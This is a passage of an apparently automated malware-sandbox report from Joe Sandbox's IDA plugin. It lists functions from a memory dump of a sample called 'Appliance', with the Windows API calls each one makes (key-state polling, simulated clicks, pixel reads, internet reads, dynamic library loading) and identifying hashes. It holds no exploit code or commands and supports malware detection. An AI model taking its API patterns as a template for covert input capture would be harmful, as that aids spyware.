VariantInit.OLEAUT32(?), ref: 00E29534
VariantClear.OLEAUT32 ref: 00E295A5
VariantClear.OLEAUT32 ref: 00E29604
VariantClear.OLEAUT32(?), ref: 00E29677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E296A2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 59788b82bce5422be5ca3cde0851813a9ba8d35d0e5de9ddf862813e97c08806
Instruction ID: c9f5381e600e3987404d1e49a32fa5b6a57483cbe6ffe7eef850eed431e1b760
Opcode Fuzzy Hash: 59788b82bce5422be5ca3cde0851813a9ba8d35d0e5de9ddf862813e97c08806
Instruction Fuzzy Hash: C85149B5A00219AFCB14CF59D884AAAB7F9FF89314F158559E91AEB310E730E911CB90

Function 00E39540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E395F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E3961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E39677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E3969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E396A4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 5126571a69765b2ffd40f0c05dfd96e7dcdf17e5485842f31ab5cdb1fc33797e
Instruction ID: 003a3c8ce69c5668981f3a6262160770d59b1011919d2decb9d8c9bb3525f728
Opcode Fuzzy Hash: 5126571a69765b2ffd40f0c05dfd96e7dcdf17e5485842f31ab5cdb1fc33797e
Instruction Fuzzy Hash: 18512B35A00215AFCF15DF65C885E6ABBF5FF48314F048458E849AB362CB75ED45CBA0

Function 00E49941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E4999D
GetProcAddress.KERNEL32(00000000,?), ref: 00E49A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00E49A49
GetProcAddress.KERNEL32(00000000,?), ref: 00E49A8F
FreeLibrary.KERNEL32(00000000), ref: 00E49AAF

Part of subcall function 00DDF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E31A02,?,753CE610), ref: 00DDF9F1
Part of subcall function 00DDF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E20354,00000000,00000000,?,?,00E31A02,?,753CE610,?,00E20354), ref: 00DDFA18

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 72a2117c5b14988892492b840744b746690940e3eed03cdec3c84763b1eb2386
Instruction ID: e04cedef611d8647afdaff0e58be6dd224df3bcc02b9c1b189c20025e5cc334a
Opcode Fuzzy Hash: 72a2117c5b14988892492b840744b746690940e3eed03cdec3c84763b1eb2386
Instruction Fuzzy Hash: A3515D35604205DFCB10DF64C485D9EBBB0FF49318B059199E90AAB762DB31ED85CFA1

Function 00E575AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E5766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00E57682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E576AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E3B5BE,00000000,00000000), ref: 00E576D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E576FF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 4be209456a1d580a5d4bb27585bdcd9d07cdd9b0541b828986d8d607317ee678
Instruction ID: 64f47d418657dcc1093d3ff363410abdc96acd18cf432a05a6ea2773074081ff
Opcode Fuzzy Hash: 4be209456a1d580a5d4bb27585bdcd9d07cdd9b0541b828986d8d607317ee678
Instruction Fuzzy Hash: 3D412735A08604AFCB29CF2CEC48FA57BA5EB09355F051655FC89B72E0C7B0ED68CA50

Function 00DF23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00DF2433
_free.LIBCMT ref: 00DF2453

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 726e40e581f44fd07104aef2cec77be1a4cb439caa9df5c2e1b4548d031109f1
Instruction ID: 03c0f4a025c4a5f925d049f04357f90ca9b3c6e466b908a61d337faf8ff5233e
Opcode Fuzzy Hash: 726e40e581f44fd07104aef2cec77be1a4cb439caa9df5c2e1b4548d031109f1
Instruction Fuzzy Hash: 2E41C332A002049FCB20DF78C881A79B7E5EF88314F168568EA15EB395D671ED01CBA0

Function 00DC19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DC19E1
ScreenToClient.USER32(00000000,?), ref: 00DC19FE
GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8bc889b6d7f16243d1eb3e5daac33b63a3fb1cb78ee4b15d4708de0e2eeb9018
Instruction ID: 73627aff11235a34ca6dc7e9b0b4d63b64789955ed6cf9316a84b76974264982
Opcode Fuzzy Hash: 8bc889b6d7f16243d1eb3e5daac33b63a3fb1cb78ee4b15d4708de0e2eeb9018
Instruction Fuzzy Hash: 72419275A0521AFFDF159F64C844BEEB774FB09324F20421AE469A32D0C7305A95CB61

Function 00E2224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E22262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00E2230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00E22316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00E22327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E2232F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a801e8ea436e9d7550f40b4f336d7c0f4223c07296b76c08355c77b7474acead
Instruction ID: 81d3647ea542071957343cb64bd9b3754e6fbed1d2e993e224a2b1567e88419b
Opcode Fuzzy Hash: a801e8ea436e9d7550f40b4f336d7c0f4223c07296b76c08355c77b7474acead
Instruction Fuzzy Hash: 0131D672900219EFDB14CFA8DD89ADE3BB5EB04315F104619FA25F72E0C7B0A944DB91

Function 00E3D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00E3D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3DA37

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 7021304a104d11015c2e86a84d2c37762287707671d1a8dd4a8876b977f0e095
Instruction ID: bd8185ef852a1a35c649d1d9a1d6a6f267b672ed58d0b7da9afea25799568eff
Opcode Fuzzy Hash: 7021304a104d11015c2e86a84d2c37762287707671d1a8dd4a8876b977f0e095
Instruction Fuzzy Hash: 4C317C71508304EFDB24DFA6EC88AAABBFCEB44355F10982EE546E2150D770EE44DB60

Function 00E561A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E561E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00E5623C
_wcslen.LIBCMT ref: 00E5624E
_wcslen.LIBCMT ref: 00E56259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E562B5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 6651a58cde34d493c1dfe21ff26f742647afc2c9cffe32f2e33003989d02e6c1
Instruction ID: 4454408278f36480573b2479dd801c3cfe8665a29428adfa12996513af51a2f7
Opcode Fuzzy Hash: 6651a58cde34d493c1dfe21ff26f742647afc2c9cffe32f2e33003989d02e6c1
Instruction Fuzzy Hash: E121A5359002189ADF219F55CC84AEE77B8EF44315F105A16FD25FB190D7708989CF60

Function 00E4138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E413AE
GetForegroundWindow.USER32 ref: 00E413C5
GetDC.USER32(00000000), ref: 00E41401
GetPixel.GDI32(00000000,?,00000003), ref: 00E4140D
ReleaseDC.USER32(00000000,00000003), ref: 00E41445

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 00c9953ca5a41d1209728a1eaf44ed146e75c56a56452337e5e0cc57b9c4f5bf
Instruction ID: 1492ee9b5155825b3a1f4c2758862e89e95d6f85c7ece5c8e84c3b9e20d34fc2
Opcode Fuzzy Hash: 00c9953ca5a41d1209728a1eaf44ed146e75c56a56452337e5e0cc57b9c4f5bf
Instruction Fuzzy Hash: FF216276604204AFDB14DF65DC89A9EBBE5EF48301F04847DE54AE7751DA70AC44CB60

Function 00DFD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00DFD146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DFD169

Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DFD18F
_free.LIBCMT ref: 00DFD1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DFD1B1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 36a58fbb881f873ddb6b86cf9b39bb9e4ee58380c36be303f1c6034a0bb437a7
Instruction ID: d3b30c43de17cd685414ff67879e54f2cd08257342582989781a9926660725ea
Opcode Fuzzy Hash: 36a58fbb881f873ddb6b86cf9b39bb9e4ee58380c36be303f1c6034a0bb437a7
Instruction Fuzzy Hash: 2701847660671D7F33216A779C8CD7B7A6FDFC2B6131A8629FE04D6244DA708D0181B1

Function 00DF316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00DEF64E,00DE545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF3170
_free.LIBCMT ref: 00DF31A5
_free.LIBCMT ref: 00DF31CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF31D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF31E2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a16b5da106c59c32e6fefff2639bebe9e6c17797db49e9eb07f90fdf9ff34aab
Instruction ID: 5ed3c443335171b4ac2c98df74e238ed557dfb20d2b46672d6795be4ceac36e3
Opcode Fuzzy Hash: a16b5da106c59c32e6fefff2639bebe9e6c17797db49e9eb07f90fdf9ff34aab
Instruction Fuzzy Hash: C5012D726497082F9A1227359C49D7B165DEFC1772727C524FB15E22D1EF21CF054270

Function 00E208FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?,?,00E20C4E), ref: 00E2091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?), ref: 00E20954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20960

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: a5dd92b056437b6b58eccd9968be3d17ee218f994dd0e66f24681e13c4a0477b
Instruction ID: 250d7484bafff0c843fa44e4899f34c5afefec172fdf8096d2f6a0fe23652bca
Opcode Fuzzy Hash: a5dd92b056437b6b58eccd9968be3d17ee218f994dd0e66f24681e13c4a0477b
Instruction Fuzzy Hash: F901DB72600324AFEB294F56EC04B9A7BACEBC4796F140424F906F2252E770CD808BA0

Function 00E2F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00E2F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00E2F2BC
Sleep.KERNEL32(00000000), ref: 00E2F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00E2F2CE
Sleep.KERNEL32 ref: 00E2F30A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8dbeca164c287f6af1341c47551b44ec183cd8d57d6baa676bce3ea125a315e1
Instruction ID: 3a0f5f60c41c55ea9f40fd569ad4b4092ee852f397c335cfa408619d3373c7b7
Opcode Fuzzy Hash: 8dbeca164c287f6af1341c47551b44ec183cd8d57d6baa676bce3ea125a315e1
Instruction Fuzzy Hash: DC01A931C05629DFCF14EFA5ED48AEEBB78FB08701F00182AE501F2290CB309558C7A1

Function 00E21A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 44b3dd49bb2f3efb5a0e1e2941d1e330a505045a7e5b4e0f79ca4c605bbb7622
Instruction ID: 868b695bd438ebffed4176f8351340cb4002ca502883ccd37f8f28894dc7b131
Opcode Fuzzy Hash: 44b3dd49bb2f3efb5a0e1e2941d1e330a505045a7e5b4e0f79ca4c605bbb7622
Instruction Fuzzy Hash: 4B01A4B5601716BFDF254F65EC48D6B3B7DEF84365B210854F845E3260DA71DD40CA60

Function 00E21960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E21976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E21982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E21991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E21998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E219AE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 08dbf52eeeaf4a0692a32e5edee6d37d55a1bf2d3fedcc519b98ca3404b7a59c
Instruction ID: b78bd842bd0327ecfb49f5317844b5dbb7f03bb571d189c065f02355e17e61c6
Opcode Fuzzy Hash: 08dbf52eeeaf4a0692a32e5edee6d37d55a1bf2d3fedcc519b98ca3404b7a59c
Instruction Fuzzy Hash: D9F06275104311AFDB254F65EC59F563B6DEFC97A1F100854F946E7290CA70DA44CA60

Function 00E21900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E21916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E21922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E21931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E21938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2194E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
